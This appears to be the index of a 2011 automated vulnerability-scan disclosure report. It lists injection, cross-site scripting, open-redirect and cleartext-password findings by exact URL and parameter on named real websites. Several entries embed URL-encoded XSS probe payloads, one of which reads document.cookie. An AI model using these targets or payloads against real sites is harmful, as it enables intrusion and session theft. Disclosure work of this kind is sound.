XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05082011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 08:04:03 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
Loading

1. OS command injection

1.1. https://secure.trust-guard.com/ [__utmb cookie]

1.2. https://secure.trust-guard.com/ [__utmc cookie]

1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

1.4. https://secure.trust-guard.com/index.php [__utma cookie]

1.5. https://secure.trust-guard.com/index.php [__utmz cookie]

1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]

2. SQL injection

2.1. http://ads.allatsea.net/www/delivery/spc.php [name of an arbitrarily supplied request parameter]

2.2. http://apps.sapha.com/appshandler.php [ac parameter]

2.3. http://dce.sapha.com/engine.php [ac parameter]

2.4. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

2.5. http://dce.sapha.com/logging.php [ac parameter]

2.6. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]

2.7. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]

2.8. http://poll.websitegear.com/compactpoll.asp [pollID parameter]

2.9. https://secure.trust-guard.com/ [__utmb cookie]

2.10. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]

2.11. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]

2.12. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]

2.13. https://secure.trust-guard.com/ResetPassword.php [name of an arbitrarily supplied request parameter]

2.14. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

2.15. https://secure.trust-guard.com/index.php [__utmb cookie]

2.16. https://secure.trust-guard.com/index.php [__utmz cookie]

2.17. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]

2.18. https://subscribe.haymarketmedia.com/scm/ [form parameter]

2.19. http://tours.sapha.com/ [scs_sid parameter]

2.20. http://tours.sapha.com/ [scs_sid parameter]

2.21. http://tours.sapha.com/ [scs_tid parameter]

2.22. http://tours.sapha.com/ [scs_tid parameter]

2.23. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

2.24. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

2.25. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

2.26. http://www.caribbean-ocean.com/get-image.php [id parameter]

2.27. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

2.28. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

2.29. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

2.30. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]

2.31. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]

2.32. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

2.33. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]

2.34. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]

2.35. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]

2.36. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 3]

2.37. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]

2.38. http://www.expedia.com/pub/agent.dll [rged parameter]

2.39. http://www.expedia.com/pub/agent.dll [rgst parameter]

2.40. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]

2.41. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]

2.42. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]

2.43. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]

2.44. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]

2.45. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]

2.46. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]

2.47. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]

2.48. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

2.49. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

2.50. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]

2.51. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

2.52. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

2.53. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

2.54. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]

2.55. http://www.millerwelds.com/financing/index.php [name of an arbitrarily supplied request parameter]

2.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

2.57. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

2.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

2.59. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

2.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

2.61. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

2.62. http://www.nutter.com/attorneys.php [AttorneyID parameter]

2.63. http://www.nutter.com/careers.php [CareerID parameter]

2.64. http://www.nutter.com/careers.php [CategoryID parameter]

2.65. http://www.socialfollow.com/button/image/ [b parameter]

3. LDAP injection

3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

4. HTTP header injection

4.1. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]

4.3. http://bidder.mathtag.com/iframe/notify [exch parameter]

4.4. http://d.xp1.ru4.com/activity [redirect parameter]

4.5. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://ad.adlegend.com/jscript [@CPSC@ parameter]

5.11. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]

5.12. http://ad.adlegend.com/jscript [target parameter]

5.13. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [adurl parameter]

5.14. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [ai parameter]

5.15. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [client parameter]

5.16. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [num parameter]

5.17. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]

5.18. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]

5.19. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]

5.20. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]

5.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

5.22. http://adsfac.us/ag.asp [cc parameter]

5.23. http://apps.sapha.com/appshandler.php [ac parameter]

5.24. http://apps.sapha.com/appshandler.php [ac parameter]

5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.26. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.27. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.28. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.29. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.30. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.31. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.32. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.33. http://bid.openx.net/json [c parameter]

5.34. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]

5.35. http://dce.sapha.com/engine.php [ac parameter]

5.36. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

5.37. http://depot.activalive.com/app/deployment.php [d[] parameter]

5.38. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

5.39. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]

5.40. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]

5.41. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]

5.42. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]

5.43. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]

5.44. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]

5.45. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]

5.46. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpck parameter]

5.47. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpvc parameter]

5.48. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpck parameter]

5.49. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpvc parameter]

5.50. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.51. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.52. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.53. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.54. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.55. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.56. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.57. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.58. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.59. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article [!category parameter]

5.60. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]

5.61. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index [!category parameter]

5.62. http://iv.doubleclick.net/adj/nbcu.lim.har/news-local-article [!category parameter]

5.63. http://iv.doubleclick.net/adj/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]

5.64. http://jlinks.industrybrains.com/jsct [ct parameter]

5.65. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.66. http://js.revsci.net/gateway/gw.js [csid parameter]

5.67. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.68. http://kroogy.com/a [REST URL parameter 1]

5.69. http://kroogy.com/favicon.ico [REST URL parameter 1]

5.70. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]

5.71. http://kroogy.com/pub/banner_728_90.php [REST URL parameter 1]

5.72. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

5.73. http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a [REST URL parameter 1]

5.74. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]

5.75. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]

5.76. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 1]

5.77. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 2]

5.78. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 1]

5.79. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 2]

5.80. http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a [REST URL parameter 1]

5.81. http://learn.bridgefront.com/sendpassword [button1 parameter]

5.82. http://learn.bridgefront.com/sendpassword [button2 parameter]

5.83. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]

5.84. http://learn.bridgefront.com/sendpassword [forwardpage parameter]

5.85. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]

5.86. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

5.87. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]

5.88. http://learn.bridgefront.com/sendpassword [totalvalues parameter]

5.89. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

5.90. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

5.91. http://login.vindicosuite.com/default.asp [message parameter]

5.92. http://login.vindicosuite.com/default.asp [message parameter]

5.93. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.94. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.95. https://secure.trust-guard.com/index.php [txtEmail parameter]

5.96. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

5.97. http://store.kentuckyderby.com/cart.php [rs parameter]

5.98. https://subscribe.haymarketmedia.com/scm/ [form parameter]

5.99. http://support.expedia.com/app/answers/list/ [name of an arbitrarily supplied request parameter]

5.100. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

5.101. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]

5.102. http://tours.sapha.com/ [scs_sid parameter]

5.103. http://tours.sapha.com/ [scs_tid parameter]

5.104. https://verify.authorize.net/anetseal/ [rurl parameter]

5.105. http://widgets.digg.com/buttons/count [url parameter]

5.106. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]

5.107. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

5.108. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

5.109. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

5.110. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]

5.111. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

5.112. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

5.113. http://www.caribbean-ocean.com/get-image.php [id parameter]

5.114. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

5.115. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

5.116. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

5.117. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]

5.118. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]

5.119. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

5.120. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

5.121. http://www.expedia.com/pub/agent.dll [date1 parameter]

5.122. https://www.expedia.com/pub/agent.dll [selc parameter]

5.123. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]

5.124. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]

5.125. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]

5.126. http://www.ezflexplan.com/navigation/menu.asp [id parameter]

5.127. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders [name of an arbitrarily supplied request parameter]

5.128. http://www.horseracingnation.com/probables/probables.aspx [name of an arbitrarily supplied request parameter]

5.129. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.130. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]

5.131. http://www.hunton.com/dallas-united-states-of-america/ [name of an arbitrarily supplied request parameter]

5.132. http://www.hunton.com/disclaimer/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.133. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.134. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]

5.135. http://www.hunton.com/private_wealth_advisors/ [name of an arbitrarily supplied request parameter]

5.136. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

5.137. http://www.hunton.com/professionals/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.138. http://www.hunton.com/services/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.139. http://www.hunton.com/sitemap/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.140. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

5.141. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

5.142. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

5.143. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

5.144. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

5.145. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

5.146. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.147. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.148. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

5.149. http://www.nutter.com/attorneys.php [AttorneyID parameter]

5.150. http://www.nutter.com/careers.php [CareerID parameter]

5.151. http://www.nutter.com/careers.php [CategoryID parameter]

5.152. http://www.socialfollow.com/button/ [b parameter]

5.153. http://www.socialfollow.com/button/ [b parameter]

5.154. http://www.socialfollow.com/button/css/ [b parameter]

5.155. http://www.socialfollow.com/button/css/ [socialSites parameter]

5.156. http://www.socialfollow.com/login.php [tEmail parameter]

5.157. http://www.tagged.com/api/ [data parameter]

5.158. http://www.tagged.com/api/ [data parameter]

5.159. https://www.taxnotebook.com/Login/PopupMessage.aspx [usr parameter]

5.160. http://www.twinspiresclub.com/members/join [REST URL parameter 2]

5.161. http://www.twinspiresclub.com/members/join [name of an arbitrarily supplied request parameter]

5.162. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.163. http://apps.sapha.com/appshandler.php [sapha_1_19 cookie]

5.164. http://apps.sapha.com/appshandler.php [sapha_2546_1 cookie]

5.165. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.166. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.167. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.168. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.169. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.170. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.171. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.172. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.173. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.174. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.175. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.176. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]

5.177. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]

5.178. http://hmficweb.hinghammutual.com/billing_view/login.asp [HinghamLoginError cookie]

5.179. https://myaccount.nytimes.com/gst/forgot [RMID cookie]

5.180. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

5.181. http://support.expedia.com/app/answers/list/ [MC1 cookie]

5.182. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F [MC1 cookie]

5.183. http://www.expedia.com/default.asp [MC1 cookie]

6. Flash cross-domain policy

6.1. http://a.collective-media.net/crossdomain.xml

6.2. http://action.mathtag.com/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://adsfac.us/crossdomain.xml

6.5. http://altfarm.mediaplex.com/crossdomain.xml

6.6. http://api.facebook.com/crossdomain.xml

6.7. http://apps.sapha.com/crossdomain.xml

6.8. http://ar.voicefive.com/crossdomain.xml

6.9. http://as.casalemedia.com/crossdomain.xml

6.10. http://b.rad.msn.com/crossdomain.xml

6.11. http://b.voicefive.com/crossdomain.xml

6.12. http://bh.contextweb.com/crossdomain.xml

6.13. http://c.scout.com/crossdomain.xml

6.14. http://c5.zedo.com/crossdomain.xml

6.15. http://c7.zedo.com/crossdomain.xml

6.16. http://cdn.eyewonder.com/crossdomain.xml

6.17. http://cdn.gigya.com/crossdomain.xml

6.18. http://cu1.activalive.com/crossdomain.xml

6.19. http://d.xp1.ru4.com/crossdomain.xml

6.20. http://depot.activalive.com/crossdomain.xml

6.21. http://fls.doubleclick.net/crossdomain.xml

6.22. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml

6.23. http://ib.adnxs.com/crossdomain.xml

6.24. http://img.mediaplex.com/crossdomain.xml

6.25. http://int.teracent.net/crossdomain.xml

6.26. http://m.adnxs.com/crossdomain.xml

6.27. http://media.fastclick.net/crossdomain.xml

6.28. http://microsoftsto.112.2o7.net/crossdomain.xml

6.29. http://nba.scout.com/crossdomain.xml

6.30. http://ne.wac.edgecastcdn.net/crossdomain.xml

6.31. http://now.eloqua.com/crossdomain.xml

6.32. http://om.expedia.com/crossdomain.xml

6.33. http://p.addthis.com/crossdomain.xml

6.34. http://pix04.revsci.net/crossdomain.xml

6.35. http://search.twitter.com/crossdomain.xml

6.36. http://secure-us.imrworldwide.com/crossdomain.xml

6.37. http://segment-pixel.invitemedia.com/crossdomain.xml

6.38. http://tags.bluekai.com/crossdomain.xml

6.39. http://tours.sapha.com/crossdomain.xml

6.40. http://va.px.invitemedia.com/crossdomain.xml

6.41. http://www2.sesamestats.com/crossdomain.xml

6.42. http://edge.sharethis.com/crossdomain.xml

6.43. http://expedia.com/crossdomain.xml

6.44. http://googleads.g.doubleclick.net/crossdomain.xml

6.45. http://player.ooyala.com/crossdomain.xml

6.46. http://www.expedia.com/crossdomain.xml

6.47. https://www.expedia.com/crossdomain.xml

6.48. http://www.tagged.com/crossdomain.xml

6.49. http://extras.expedia.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.rad.msn.com/clientaccesspolicy.xml

7.3. http://b.voicefive.com/clientaccesspolicy.xml

7.4. http://c.scout.com/clientaccesspolicy.xml

7.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

7.6. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml

7.7. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml

7.8. http://om.expedia.com/clientaccesspolicy.xml

7.9. http://player.ooyala.com/clientaccesspolicy.xml

7.10. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.11. http://www.gofileroom.com/clientaccesspolicy.xml

7.12. https://www.gofileroom.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://hmficweb.hinghammutual.com/reglogin.aspx

8.2. http://login.vindicosuite.com/

8.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

8.4. http://login.vindicosuite.com/default.asp

8.5. http://www.advisorsquare.com/useradmin/Authenticate.asp

8.6. http://www.alumniconnections.com/alumni_members/mylisting/index.html

8.7. http://www.eneighborhoods.com/login_form.asp

8.8. http://www.gofileroom.com/lbmc/

8.9. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders

8.10. http://www.horseracingnation.com/probables/probables.aspx

8.11. http://www.lbmc.com/user

8.12. http://www.nbcconnecticut.com/

8.13. http://www.nbcconnecticut.com/

8.14. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

8.15. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

8.16. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

8.17. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

8.18. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

8.19. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

8.20. http://www.resiteonline.com/

8.21. http://www.socialfollow.com/

8.22. http://www.socialfollow.com/

8.23. http://www.socialfollow.com/blog/

8.24. http://www.socialfollow.com/login.php

8.25. http://www.socialfollow.com/login.php

8.26. http://www.twinspiresclub.com/members/join

9. XML injection

9.1. http://api.facebook.com/restserver.php [format parameter]

9.2. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx [ASP.NET_SessionId cookie]

9.3. http://www.expedia.com/daily/common/moreinfo.asp [mon parameter]

9.4. http://www.expedia.com/pub/agent.dll [hfnm parameter]

9.5. https://www.expedia.com/pub/agent.dll [COOKIECHECK cookie]

9.6. https://www.expedia.com/pub/agent.dll [JSESSION cookie]

9.7. https://www.expedia.com/pub/agent.dll [MC1 cookie]

9.8. https://www.expedia.com/pub/agent.dll [U9Z5 cookie]

9.9. https://www.expedia.com/pub/agent.dll [aspp cookie]

9.10. https://www.expedia.com/pub/agent.dll [bn_u cookie]

9.11. https://www.expedia.com/pub/agent.dll [hfnm parameter]

9.12. https://www.expedia.com/pub/agent.dll [iEAPID cookie]

9.13. https://www.expedia.com/pub/agent.dll [ipsnf3 cookie]

9.14. https://www.expedia.com/pub/agent.dll [jscript cookie]

9.15. https://www.expedia.com/pub/agent.dll [p1 cookie]

9.16. https://www.expedia.com/pub/agent.dll [s1 cookie]

9.17. https://www.expedia.com/pub/agent.dll [s_sess cookie]

9.18. https://www.expedia.com/pub/agent.dll [s_vi cookie]

9.19. https://www.expedia.com/pub/agent.dll [srvys cookie]

10. Password returned in later response

10.1. http://www.socialfollow.com/

10.2. http://www.socialfollow.com/blog/

11. SQL statement in request parameter

11.1. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

11.2. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

11.3. http://login.vindicosuite.com/default.asp

11.4. http://login.vindicosuite.com/vindico_dynamic.asp

11.5. https://secure.trust-guard.com/ResetPassword.php

11.6. https://secure.trust-guard.com/index.php

11.7. http://www.caribbean-ocean.com/get-image.php

11.8. http://www.socialfollow.com/button/image/

12. SSL cookie without secure flag set

12.1. https://broker.gotoassist.com/h/lbmc

12.2. https://secure.trust-guard.com/

12.3. https://secure.trust-guard.com/ResetPassword.php

12.4. https://secure.trust-guard.com/index.php

12.5. https://subscribe.haymarketmedia.com/scm/

12.6. https://www.taxnotebook.com/Login/PopupMessage.aspx

12.7. https://www.taxnotebook.com/Login/TNLogin.aspx

12.8. https://www.taxnotebook.com/tnstart.asp

12.9. https://meter-svc.nytimes.com/meter.js

12.10. https://www.expedia.com/pub/agent.dll

12.11. https://www.gofileroom.com/lbmc

13. Session token in URL

13.1. http://ads.adonion.com/serving/showbanner.php

13.2. http://bh.contextweb.com/bh/set.aspx

13.3. https://broker.gotoassist.com/ds/queryPost.flow

13.4. https://broker.gotoassist.com/javaScriptTester.tmpl

13.5. http://fls.doubleclick.net/activityi

13.6. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/ps/ifr

13.7. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/ps/ifr

13.8. http://l.sharethis.com/pview

13.9. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

13.10. http://sales.liveperson.net/hc/56727252/

13.11. http://www.tagged.com/api/

14. ASP.NET ViewState without MAC enabled

14.1. http://nba.scout.com/

14.2. https://subscribe.haymarketmedia.com/scm/

14.3. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

14.4. https://www.taxnotebook.com/Login/ChangePwd.aspx

14.5. https://www.taxnotebook.com/Login/PopupMessage.aspx

14.6. https://www.taxnotebook.com/Login/TNLogin.aspx

15. Open redirection

15.1. http://a.triggit.com/pxbk [redir parameter]

15.2. http://b.scorecardresearch.com/r [d.c parameter]

15.3. http://d.xp1.ru4.com/activity [redirect parameter]

